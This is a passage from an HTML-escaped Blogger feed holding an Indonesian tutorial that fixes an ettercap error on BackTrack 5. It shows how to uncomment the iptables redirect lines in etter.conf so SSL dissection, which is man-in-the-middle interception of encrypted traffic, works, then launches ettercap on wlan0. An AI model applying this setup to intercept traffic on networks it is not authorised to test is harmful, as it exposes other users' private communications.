&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;#&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp;$Id: etter.conf,v 1.79 2005/07/07 10:08:55 alr Exp $ &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;#&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;#&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;########################################################################&lt;/span&gt;&lt;/code&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Carilah baris seperti ini:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;#####################################&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; redir_command_on/off&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;#####################################&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# you must provide a valid script for your operating system in order to have&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# the SSL dissection available&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# note that the cleanup script is executed without enough privileges (because&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# they are dropped on startup). so you have to either: provide a setuid program&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# or set the ec_uid to 0, in order to be sure the cleanup script will be&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# executed properly&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# NOTE: this script is executed with an execve(), so you can't use pipes or&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# output redirection as if you were in a shell. We suggest you to make a script if&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# you need those commands.&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Pada bagian&lt;/div&gt;&lt;div&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;#---------------&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp; &amp;nbsp; Linux&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;#---------------&lt;/span&gt;&lt;/code&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;Cari baris:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# if you use iptables:&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Maka anda akan mendapati pengaturan seperti ini:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# if you use iptables:&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&amp;nbsp; &amp;nbsp;#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&amp;nbsp; &amp;nbsp;#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"&lt;/span&gt;&lt;/code&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: cyan; font-size: large;"&gt;2. Mengubah parameter&amp;nbsp;&lt;span class="Apple-style-span" style="font-family: monospace;"&gt;redir_command_on dan&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: monospace;"&gt;redir_command_off&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Hilangkan tanda pagar sebelum&amp;nbsp;&lt;span class="Apple-style-span" style="font-family: monospace;"&gt;redir_command_on dan&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-family: monospace;"&gt;redir_command_off&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: monospace;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: monospace;"&gt;Sehingga pengaturannya menjadi seperti ini:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: monospace;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;#####################################&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp; &amp;nbsp; &amp;nbsp; redir_command_on/off&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;#####################################&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# you must provide a valid script for your operating system in order to have&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# the SSL dissection available&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# note that the cleanup script is executed without enough privileges (because&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# they are dropped on startup). so you have to either: provide a setuid program&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# or set the ec_uid to 0, in order to be sure the cleanup script will be&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# executed properly&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# NOTE: this script is executed with an execve(), so you can't use pipes or&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# output redirection as if you were in a shell. We suggest you to make a script if&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# you need those commands.&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;#---------------&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# &amp;nbsp; &amp;nbsp; Linux&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;#---------------&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# if you use ipchains:&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&amp;nbsp; &amp;nbsp;#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&amp;nbsp; &amp;nbsp;#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;# if you use iptables:&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&amp;nbsp; &amp;nbsp;redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&amp;nbsp; &amp;nbsp;redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: monospace;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: monospace;"&gt;Tekan ctrl+x untuk keluar dari konsol nano. Tekan y untuk menyimpan. Tekan enter untuk menyimpan meng-overwrite file lama.&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: monospace;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: monospace;"&gt;Kemudian jalankan kembali ettercap:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: monospace;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: monospace;"&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: white; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; line-height: 18px;"&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Command:&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;# ettercap -T -q -i wlan0&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: monospace;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-_CdKJCRfEDQ/TzC77yMFVCI/AAAAAAAABNA/aNuWdjzkIak/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="195" src="http://3.bp.blogspot.com/-_CdKJCRfEDQ/TzC77yMFVCI/AAAAAAAABNA/aNuWdjzkIak/s320/5.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: monospace;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: monospace;"&gt;Perfect as usual&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: monospace;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: monospace;"&gt;&lt;b&gt;created by : &lt;span class="Apple-style-span" style="color: red;"&gt;red-dragon&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4322924474312123143-6807368700418875473?l=www.root-bt.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.root-bt.co.cc/2012/02/fix-ettercap-ipforwarding-was-disabled.html</link><author>noreply@blogger.com (Double Dragon)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-7qghir3BNmQ/TzC9aueYTLI/AAAAAAAABNQ/NKY3iQpgSCs/s72-c/2.png' height='72' width='72'/><thr:total>2</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-4322924474312123143.post-8556270015772624217</guid><pubDate>Tue, 07 Feb 2012 05:55:00 +0000</pubDate><atom:updated>2012-02-07T12:55:26.937+07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>SSL dissection</category><category domain='http://www.blogger.com/atom/ns#'>Fix</category><category domain='http://www.blogger.com/atom/ns#'>ettercap</category><category domain='http://www.blogger.com/atom/ns#'>redir_command_on</category><category domain='http://www.blogger.com/atom/ns#'>etter.conf</category><category domain='http://www.blogger.com/atom/ns#'>error</category><category domain='http://www.blogger.com/atom/ns#'>bug</category><category domain='http://www.blogger.com/atom/ns#'>BackTrack</category><title>FIX Ettercap SSL dissection needs a valid 'redir_command_on'</title><description>Pengguna backtrack 5 R1 yang sudah menggunakan ettercap, mungkin mengalami masalah ini. Terdapat pesan error ketika ettercap melakukan unified sniffing. Pesan errornya adalah:&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;SSL dissection needs a valid 'redir_command_on'&amp;nbsp;script in the etter.conf file&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-Kx73N1k56Gs/TzC6aeroteI/AAAAAAAABM4/ioUJT6lf1VM/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="195" src="http://3.bp.blogspot.com/-Kx73N1k56Gs/TzC6aeroteI/AAAAAAAABM4/ioUJT6lf1VM/s320/1.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Bagaimana mengatasinya?&lt;/div&gt;&lt;div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: cyan; font-size: large;"&gt;1. Buka terminal, lalu masukan perintah:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="color: white; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; line-height: 18px;"&gt;&lt;div class="title" style="background-color: black; 